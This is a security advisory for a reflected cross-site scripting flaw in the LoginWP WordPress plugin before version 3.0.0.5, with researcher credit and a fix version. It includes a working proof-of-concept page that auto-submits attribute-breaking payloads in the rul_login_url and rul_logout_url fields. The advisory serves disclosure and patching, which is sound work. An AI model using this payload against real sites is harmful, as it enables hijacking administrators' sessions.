WordPress Plugin Vulnerabilities
LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=loginwp-redirections&new=1" id="hack" method="POST">
<input type="hidden" name="rul_login_url" value='" style=animation-name:rotation onanimationstart=alert(/XSS-login_url/)//' />
<input type="hidden" name="rul_logout_url" value='" style=animation-name:rotation onanimationstart=alert(/XSS-logout_url/)//' />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html> Affects Plugins
Fixed in version 3.0.0.5
References
Classification
Miscellaneous
Original Researcher
JrXnm
Submitter
JrXnm
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-11-08 (about 6 months ago)
Added
2021-11-08 (about 6 months ago)
Last Updated
2022-04-16 (about 1 months ago)